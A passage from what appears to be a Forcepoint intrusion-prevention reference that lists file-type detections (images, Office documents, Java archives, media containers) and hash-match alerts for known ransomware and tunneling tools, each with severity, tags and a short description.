Tags: Forcepoint SMC Log, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: Forcepoint Stonesoft Management Center (SMC) is a centralized management system for Forceporint Stonesoft Next-Generation Firewall (NGFW). SMC stores its logs to compressed propietary binary files.
Back to top

File_Forcepoint-URL-Database-Update

About this situation: Forcepoint URL database update file detected
Context: File Type
Severity: 1
Tags: Forcepoint URL Database, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Description: Forcepoint URL database is used by many security products. The updates are delivered using encrypted update files.
Back to top

File_Forcepoint-Web-Content-Gateway-Analytic-Feedback-Data

About this situation: WCG Analytic Feedback detected
Context: File Type
Severity: 1
Tags: Forcepoint Analytic Feedback data, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Description: Forcepoint Web Content Gateway Analytic Feedback data detected.
Back to top

File_Generic-Interpreted-Script

About this situation: An interpreted script file detected
Context: File Type
Severity: 1
Tags: Interpreted Script, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Description: Generic identification for a script file which starts by defining the interpreter. MIME type: text/x-shellscript
Back to top

File_Generic-OLE-Package

About this situation: Generic OLE package detected
Context: File Type
Severity: 1
Tags: Generic OLE Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Object Linking and Embedding, OLE, is a technique used mainly in the Microsoft Windows operating system to embed objects, such as pictures or documents, to another files. Generic OLE package is a container format. MIME type: application/msoffice-doc
Back to top

File_GIF-Filename-Extension

About this situation: A file with GIF filename extension detected
Context: File Type
Severity: 1
Tags: GIF Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: A file with an filename extension "gif" was detected. This may indicate that file contains a grahic image using GIF file format, however, if the file content is not available this cannot be validated. This detection is based on the filename, and filename alone.
Back to top

File_GIF-Image

About this situation: GIF File detected
Context: File Type
Severity: 1
Tags: GIF Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Graphics Interchange File (GIF) is a raster graphics file format developed in 1987 by Steve Wihite for CompuServe.
Back to top

File_Google-Chrome-CRX-Extension-Package

About this situation: Google Chrome CRX extension file detected
Context: File Type
Severity: 1
Tags: Google Chrome CRX Extension Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Google's browser, Chrome and it's open source variant Chromium, uses extension packages to extend the features of the browser. These are small programs that run in the context of the browser process.
Back to top

File_Google-Safesearch-Update

About this situation: Google Safesearch update file detected
Context: File Type
Severity: 1
Tags: Google Safesearch Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-729-5211
Description: Google SafeSearch is a service that provides information whether an URL is known to contain malware or otherwise considered unsafe.
Back to top

File_GPass-Binary-MD5

About this situation: GPass Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Description: GPass Binary file transfer was detected. GPass is a network traffic anonymization tool.
Back to top

File_Gzip-Compressed

About this situation: GZip compressed file detected
Context: File Type
Severity: 1
Tags: Gzip Compressed File, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: gzip is a widely used compression program. It is designed to replace legacy Unix "compress"-tool. The first version was released in 1992 as a part of the GNU Project. MIME type: application/x-gzip
Back to top

File_HakunaMatata-Ransomware-Binary-MD5

About this situation: HakunaMatata Ransomware binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-872-5242
Description: A file that has a MD5 checksum matching to HakunaMatata ransomware binary has been detected. HakunaMatata ransomware encrypts files on the affected system and renames them with the suffix .hakunamatata.
Back to top

File_HakunaMatata-Ransomware-Binary-SHA1

About this situation: HakunaMatata Ransomware binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-872-5242
Description: A file that has a SHA1 checksum matching to HakunaMatata ransomware binary has been detected. HakunaMatata ransomware encrypts files on the affected system and renames them with the suffix .hakunamatata.
Back to top

File_Hidden-Cobra-APT-Binary-MD5

About this situation: Hidden Cobra APT binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Description: A file that has a MD5 checksum matching to Hidden Cobra APT binary has been detected.
Back to top

File_Hidden-Cobra-APT-Binary-SHA1

About this situation: Hidden Cobra APT binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Description: A file that has a SHA1 checksum matching to Hidden Cobra APT binary has been detected.
Back to top

File_HTML

About this situation: HTML file detected
Context: File Type
Severity: 1
Tags: HTML, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Hypertext Markup Language (HTML) is the markup language that is used to describe the content of a web page. I may contain links to another files or pages, active content such as scripts, other elements and visual layout hints. MIME type: text/html
Back to top

File_HTML-POST-Form-Data

About this situation: HTML POST Form Data detected
Context: File Type
Severity: 1
Tags: HTML, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-790-5211
Last changed: sgpkg-ips-790-5211
Description: When HTML form data is submitted, it is usually sent in a HTTP request message. With a POST request the data is placed in the body of the HTTP message.
Back to top

File_HTTP-Injector-Binary-MD5

About this situation: HTTP Injector Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-857-5242
Description: HTTP Injector Binary file transfer was detected. HTTP Injector is a network traffic anonymization tool.
Back to top

File_IBM-BigFix-Monitoring-File

About this situation: IBM BigFix monitoring file detected
Context: File Type
Severity: 1
Tags: IBM BigFix Monitoring, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Description: IBM BigFix is a management software used in enterprise networks to monitor company assets. The executable BESClient.exe reports information about the monitored computer to the company IT.
Back to top

File_IBM-BigFix-Site

About this situation: IBM Bigfix site file detected
Context: File Type
Severity: 1
Tags: IBM Bigfix Site, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: IBM Bigfix is an asset inventory, remote control, software deployment and patch management system for enterprises. Previously known as Tivoli Endpoint Manager.
Back to top

File_IBM-OS2-Trace-Description

About this situation: IBM OS/2 Trace Description file detected
Context: File Type
Severity: 1
Tags: IBM OS2 Trace Description, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Trace Descriptions contain information for IBM OS/2 dynamic runtime and kernel debugger. These files are used in conjuction with the system trace facility.
Back to top

File_iCalendar

About this situation: iCalendar file detected
Context: File Type
Severity: 1
Tags: iCalendar, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Description: iCalendar (ICS) file format is used to share and deliver calendar events, such as meeting requests. It has been developed from vCalendar file format and is standardized in IETF RFC 5545.
Back to top

File_Interchange-File-Format

About this situation: Interchange File Format (IFF) media container file detected
Context: File Type
Severity: 1
Tags: Interchange File Format, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Interchange Image File (IFF) is a container file format designed by Electronic Arts and Commodore-Amiga Inc. in 1985. It is used to transfer various data, most commonly image or audio.
Back to top

File_ISO-9660-Disk-Image

About this situation: ISO 9660 disk image file detected
Context: File Type
Severity: 1
Tags: ISO 9660 Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-734-5211
Description: ISO 9960 disk image is a commonly used, standardized disk image format used to store optical media, such as CD-ROMs and DVD discs.
Back to top

File_ISO-MPEG-4-Audio

About this situation: ISO MPEG-4 compressed audio file detected
Context: File Type
Severity: 1
Tags: ISO MPEG-4 Audio, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-729-5211
Description: ISO MPEG-4 Part 14 Audio, also known as M4A, is a common audio file format that uses common MPEG-4 structure but does not contain any video streams.
Back to top

File_ISO-MPEG-4-Audiobook

About this situation: ISO MPEG-4 compressed audiobook file detected
Context: File Type
Severity: 1
Tags: ISO MPEG-4 Audiobook, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-729-5211
Description: ISO MPEG-4 Part 14 Audiobook, also known as M4P, is an audio file format used for audiobooks and podcasts.
Back to top

File_ISO-MPEG-4-Media

About this situation: ISO MPEG-4 compressed video file detected
Context: File Type
Severity: 1
Tags: MPEG Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: MPEG-4 is a compressed video file format that is widely used to distribute material over the internet ("streaming") or as standalone files for example within Compact Discs.
Back to top

File_ISO-MPEG-4-Protected-Audio

About this situation: ISO MPEG-4 compressed audio file detected
Context: File Type
Severity: 1
Tags: ISO MPEG-4 Protected Audio, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-729-5211
Description: ISO MPEG-4 Part 14 Protected Audio, also known as M4P, is an audio file format that uses common MPEG-4 structure but does not contain any video streams. It is also encrypted for the purposes of digital right managmement (DRM).
Back to top

File_ISO-MPEG-4-Protected-Video

About this situation: ISO MPEG-4 media file detected
Context: File Type
Severity: 1
Tags: ISO MPEG-4 Protected Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: ISO MPEG-4 Part 14 Protected Video, also known as M4V, is an video file format that uses common MPEG-4 structure and is encrypted for the purposes of digital right managmement (DRM).
Back to top

File_ISO-MPEG-4-Video-Stream

About this situation: ISO MPEG-4 stream media fragment detected
Context: File Type
Severity: 1
Tags: MPEG Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Description: MPEG-4 Smooth Stream is a technology developed by Microsoft that allows transfer of MPEG-4 media streams in fragments with variying bit rate and resolution.
Back to top

File_Jaff-PDF-SHA1

About this situation: Jaff Ransomware PDF SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-902-5242
Last changed: sgpkg-ips-902-5242
Description: A file that has a SHA1 checksum matching to Jaff ransomware PDF has been detected. Jaff ransomware spreads by malicious PDF attachments in email. The PDF contains a macro script which downloads and executes the Jaff ransomware.
Back to top

File_Jaff-Ransomware-SHA1

About this situation: Jaff Ransomware SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-902-5242
Last changed: sgpkg-ips-902-5242
Description: A file that has a SHA1 checksum matching to Jaff ransomware has been detected. Jaff ransomware spreads by malicious PDF attachments in email. The PDF contains a macro script which downloads and executes the Jaff ransomware.
Back to top

File_Java-Archive

About this situation: Java JAR archive file detected
Context: File Type
Severity: 1
Tags: Java Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Java programming environment stores programs and its related libraries into a single executable package, Java Archive (jar). This file is executed in the Java virtual machine. MIME type: application/java-archive
Back to top

File_Java-Archive-Manifest

About this situation: Java Archive manifest file detected
Context: File Type
Severity: 1
Tags: Java Archive Manifest, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: Java Archive (jar) files contain a manifest file that describe the content of the archive.
Back to top

File_Java-Archive-Manifest-Filename

About this situation: Filename matching jar manifest detected
Context: File Type
Severity: 1
Tags: Java Archive Manifest, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: A file with an filename "MANIFEST.MF" was detected. This may indicate that it is a manifest file for a Java archive, however, if the file content is not available this cannot be validated. This detection is based on the filename, and filename alone.
Back to top

File_Java-Archive-Signature

About this situation: Java Archive Signature file detected
Context: File Type
Severity: 1
Tags: Java Archive Signature, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: Java Archive (jar) files contain a signature file that contain the signature of the archive. The signature may be used to determine authenticy and origin of the jar file.
Back to top

File_Java-Archive-Signature-Filename

About this situation: Filename matching jar signature file detected
Context: File Type
Severity: 1
Tags: Java Archive Signature, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: A file with an filename extension ".SF" was detected. This may indicate that it is a signature file for a Java archive, however, if the file content is not available this cannot be validated. This detection is based on the filename, and filename alone.
Back to top

File_Java-Class

About this situation: Java class file detected
Context: File Type
Severity: 1
Tags: Java Class, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Java programming environment uses compiled class files to store executable programs. These programs are executed in the Java virtual machine, in either the context of the browser or as a stand-alone programs within the context of the user. MIME type: application/x-java-class
Back to top

File_Java-WebStart

About this situation: Java WebStart jnpl file detected
Context: File Type
Severity: 1
Tags: Java WebStart, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Java WebStart is techology meant to help application delivery from a remote location to a local workstation. Java programs executed via Java Web Start typically run within the context of the current user.
Back to top

File_JavaScript

About this situation: JavaScript file detected
Context: File Type
Severity: 1
Tags: JavaScript, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: JavaScript is a programming language developed by Netscape Communications for purposes of web page scripting in 1995. It is widely used and stadardized by ECMA as ECMAScript. MIME type: application/javascript
Back to top

File_JPEG-Image

About this situation: JPEG File detected
Context: File Type
Severity: 1
Tags: JPEG Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: JPEG is a lossy compression file format for digital images developed by Joint Photographic Experts Group.
Back to top

File_JSON

About this situation: JSON file detected
Context: File Type
Severity: 1
Tags: JSON, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Description: JavaScript Object Notation (JSON) is a an open-standard format for data transfer in attribute-value pairs. It is commonly used for asyncronous data transfer between the browser and the backend server in dynamic HTML applications.
Back to top

File_Kaspersky-AntiVirus-Update

About this situation: Kaspersky Antivirus update file detected
Context: File Type
Severity: 1
Tags: Kaspersky AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: Kaspersky Antivirus update file deliveres up-to-date malware detection database and associated metadata for various security products developed by Kaspersky Labs.
Back to top

File_LhArc-Archive

About this situation: LhArc archive file detected
Context: File Type
Severity: 1
Tags: LhArc Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: LhArc, also known as LHA, is freeware a file compression and archiving utility, orignally developed by Haruasu Yoshizaki in 1988. MIME type: application/x-lha
Back to top

File_Linear-Executable-LE

About this situation: Linear Executable (LE) file detected
Context: File Type
Severity: 1
Tags: Linear Executable LE, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An executable that contains Linear Executable (LE) file header was found. This is the executable file format used by OS/2 and older 16/32-bit versions of Windows. MIME type: application/x-dosexec
Back to top

File_Linear-Executable-LX

About this situation: Linear Executable (LX) file detected
Context: File Type
Severity: 1
Tags: Linear Executable LX, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An executable that contains Linear Executable (LX) file header was found. This is the executable file format used by OS/2 and older 32-bit versions of Windows. MIME type: application/x-dosexec
Back to top

File_Lotus-1-2-3-Spreadsheet

About this situation: Lotus 1-2-3 spreadsheet file detected
Context: File Type
Severity: 1
Tags: Lotus 1-2-3 Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Lotus 1-2-3 spreadsheet program develped by Lotus Software in 1983 and later by IBM. It was discontinued in 2002. It used its own proprietary binary file format.
Back to top

File_Lz4-Archive

About this situation: Lz4 archive file detected
Context: File Type
Severity: 1
Tags: Lz4 Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1730-5242
Description: Lz4 is a single file compression utility that used the LZ4 algorithm for compression. It has been developed focusing especially for compression and decompression speed.
Back to top

File_Mach-O-Executable

About this situation: Mach-O executable file detected
Context: File Type
Severity: 1
Tags: Mach-O Executable, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Mach-O executable file format is used to store executable files, object code, libraries and crash dumps. It has been originally developed for the Mach kernel, and is used by Apple within macOS and iOS operating systems. MIME type: application/x-mach-o-binary-executable
Back to top

File_Malicious-File-From-Known-Exploit-SHA1

About this situation: Malicious file with a SHA1 sum from a known exploit
Context: File SHA1 hash
Severity: 8
Tags: Inspection
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Description: Malicious file with a SHA1 sum from a known exploit
Back to top

File_Malicious-PDF-Detected-based-on-SHA1

About this situation: Malicious PDF file detected based on SHA1
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Description: A file has been detected based on it's contents matching to a known bad SHA1 checksum.
Back to top

File_Malware-Blocked

About this situation: Malicious file blocked
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A file was scanned by a scanning engine according to the file filtering policy and it was found to be malicious. The file has been blocked.
Back to top

File_Malware-Detected

About this situation: Malicious file detected
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A file was scanned by a scanning engine according to the file filtering policy and it was found to be malicious. The file has not been blocked.
Back to top

File_Malware-MD5

About this situation: Malware detected based on MD5
Context: File MD5 hash
Severity: 8
Tags: Potential Compromise
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1666-5242
Description: A file has been detected based on matching to a known bad MD5 checksum.
Back to top

File_Malware-SHA1

About this situation: Malware detected based on SHA1
Context: File SHA1 hash
Severity: 8
Tags: Potential Compromise
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1666-5242
Description: A file has been detected based on matching to a known bad SHA1 checksum.
Back to top

File_Matroska-Media-Container

About this situation: Matroska media container file detected
Context: File Type
Severity: 1
Tags: Matroska Media Container, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Matroska Multimedia Container is an open and free file format that can contain video, audio, picture or subtitle tracks in a single file.
Back to top

File_McAfee-AntiVirus-Update

About this situation: McAfee Antivirus update file detected
Context: File Type
Severity: 1
Tags: McAfee AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: This file contains detection signature updates for McAfee Antivirus product line, including McAfee Endpoint Security.
Back to top

File_McAfee-ePolicy-Ochestrator-Update

About this situation: McAfee ePolicy Orchestrator update file detected
Context: File Type
Severity: 1
Tags: McAfee ePolicy Ochestrator Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: McAfee ePolicy Ochestrator (ePO) is a centralized management system for various McAfee and other Intel Security products.
Back to top

File_Microsoft-ASF-Container

About this situation: Microsoft ASF container file detected
Context: File Type
Severity: 1
Tags: Microsoft ASF Container, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1730-5242
Description: Advanced Systems Format, ASF, is a proprietary digital audio or video container format developed by Microsoft. It is part of the Media Foundation framework.
Back to top

File_Microsoft-Cabinet-Archive

About this situation: Cabinet archive file detected
Context: File Type
Severity: 1
Tags: Microsoft Cabinet Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Cabinet, also known as Diamond, is a file archiving format that support digital certificates for authentication. It has been developed by Microsoft, and is used to distribute software installation packages. MIME type: application/vnd.ms-cab-compressed
Back to top

File_Microsoft-Control-Panel-Applet

About this situation: Microsoft Control Panel applet file detected
Context: File Type
Severity: 1
Tags: Microsoft Control Panel Applet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Control Panel Applets are small programs that are executed in the context of the Windows Control Panel.
Back to top

File_Microsoft-Diagnostic-Cabinet-File

About this situation: Diagnostic Cabinet file detected
Context: File Type
Severity: 1
Tags: Microsoft Diagnostic Cabinet File, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Description: Diagnostic Cabinet files are Cabinet archives that contain troubleshooting packages for Microsoft Support Diagnostic Tool. MIME type: application/vnd.ms-diagcab-compressed
Back to top

File_Microsoft-DirectDraw-Surface

About this situation: Microsoft DirectDraw Surface file detected
Context: File Type
Severity: 1
Tags: Microsoft DirectDraw Surface, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: DirectX is a collection of graphic application programming interfaces for Microsoft Windows. It stores texture surfaces in a DirectDraw Surface (DDS) files.
Back to top

File_Microsoft-Equation-Editor-Document

About this situation: Microsoft Equation Editor document file detected
Context: File Type
Severity: 1
Tags: Microsoft Equation Editor Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Microsoft Equation is a formula editor, shared between different applications in the Office suite prior to Office 2007. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Excel-2002-XML-Document

About this situation: Microsoft Excel 2002 legacy document detected
Context: File Type
Severity: 1
Tags: Microsoft Excel 2002 XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Microsoft Excel 2002, a part of Microsoft Office XP, introduced a new, XML-based document file format. It was superseded by the Open Office XML format in Microsoft Office 2007. MIME type: application/msoffice-xls
Back to top

File_Microsoft-Excel-2007-Binary-Spreadsheet

About this situation: Microsoft Excel 2007 spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Excel is a popular spreadsheet application developed by Microsoft. It is a part of Microsoft Office suite. Excel 2007 introduced also a new native binary file format. MIME type: application/msoffice-xlsb
Back to top

File_Microsoft-Excel-95-Spreadsheet

About this situation: Microsoft Excel 95 spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel 95 Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Microsoft Excel is a popular spreadsheet application. It supports legacy spreadsheet file formats. The Excel 95 file format is used by both Excel 5.0 and Excel 95, and was replaced within Excel 97. MIME type: application/msoffice-xls
Back to top

File_Microsoft-Excel-97-Spreadsheet

About this situation: Microsoft Excel OLE document detected
Context: File Type
Severity: 1
Tags: Microsoft Excel 97 Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Excel is a spreadsheet application developed by Microsoft. It is a part of Microsoft Office suite. Excel 97 introduced improved file format that was based on OLE Structed Storage format. It was superseded with Office Open XML format in Office 2007. MIME type: application/msoffice-xls
Back to top

File_Microsoft-Excel-Legacy-Spreadsheet

About this situation: Microsoft Excel legacy spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel Legacy Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Excel versions 1.0 - 4.0 used a proprietary binary file format. It is no longer supported and is consired legacy. MIME type: application/msoffice-xls
Back to top

File_Microsoft-Excel-Spreadsheet

About this situation: Microsoft Excel spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Excel is a popular spreadsheet application developed by Microsoft. It is a part of Microsoft Office suite. Excel 2007 introduced an open, standardized file format - Office Open XML. This format is used in all later Office versions. MIME type: application/msoffice-xls
Back to top

File_Microsoft-Excel-XLS-Filename-Extension

About this situation: Potentially an Excel spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel 97 Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-758-5211
Description: Potentially an Excel spreadsheet file was detected. This detection is based on the filename, and filename alone. MIME type: application/msoffice-xls
Back to top

File_Microsoft-Excel-XLSB-Filename-Extension

About this situation: Potentially an Excel spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Potentially an Excel spreadsheet file was detected. This detection is based on the filename, and filename alone. MIME type: application/msoffice-xlsb
Back to top

File_Microsoft-Excel-XLSX-Filename-Extension

About this situation: Potentially an Excel spreadsheet file detected
Context: File Type
Severity: 1
Tags: Microsoft Excel Spreadsheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Potentially an Excel spreadsheet file was detected. This detection is based on the filename, and filename alone. MIME type: application/msoffice-xlsx
Back to top

File_Microsoft-Hyper-V-Disk-Image

About this situation: Hyper-V disk image file detected
Context: File Type
Severity: 1
Tags: Microsoft Hyper V Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Hyper-V is a hypervisor developed by Microsoft. Hyper-V disk image files contain the contents of the entire virtual hard drive for a given guest system.
Back to top

File_Microsoft-Installer-Package

About this situation: Microsoft Installer package detected
Context: File Type
Severity: 1
Tags: Microsoft Installer Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Microsoft Installer is an installation and configuration service provided with Microsoft Windows operating system. MIME type: application/x-msi
Back to top

File_Microsoft-MS-DOS-Executable

About this situation: Microsoft MS-DOS executable file detected
Context: File Type
Severity: 1
Tags: Microsoft MS DOS Executable, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: This executable contains the traditional MS-DOS header (MZ) but no known extension headers such as Portable Executable headers (PE). MIME type: application/x-dosexec
Back to top

File_Microsoft-NCSI

About this situation: Microsoft Network Connectivity Status Indicator detected
Context: File Type
Severity: 1
Tags: Microsoft NCSI, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: Microsoft Network Connectivity Status Indicator is a feature of Microsoft Windows operating system that attempts to determine Internet connectivity. For this purpose, a short text file that contains string "Microsoft NCSI" is downloaded.
Back to top

File_Microsoft-Office-2007-XML

About this situation: Office 2007 xml file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of a native Office 2007 document. MIME type: application/msoffice-docx
Back to top

File_Microsoft-Office-Open-XML-Document

About this situation: Microsoft Office Open XML document file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Detected a native Microsoft Office document. MIME type: application/msoffice-docx
Back to top

File_Microsoft-Office-PrinterSettings

About this situation: Printer settings file for Microsoft Office
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Microsoft Office saves document specific printer configuration to separate files in the document file, for example .docx or .xlsx file.
Back to top

File_Microsoft-OLE

About this situation: OLE File detected
Context: File Type
Severity: 1
Tags: Generic OLE Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Object Linking and Embedding (OLE) is a distributed object model developed by Microsoft. It uses its own binary file format, that is utilized in a wide range of applications. MIME type: application/msoffice-doc
Back to top

File_Microsoft-PlayReady-Content

About this situation: Microsoft PlayReady content file detected
Context: File Type
Severity: 1
Tags: Microsoft PlayReady Content, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Description: Microsoft PlayReady is a digital rights management (DRM) system used to distribute protected content, such as media streams.
Back to top

File_Microsoft-PowerPoint-95-Presentation

About this situation: Microsoft PowerPoint presentation detected
Context: File Type
Severity: 1
Tags: Microsoft PowerPoint 95 Presentation, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
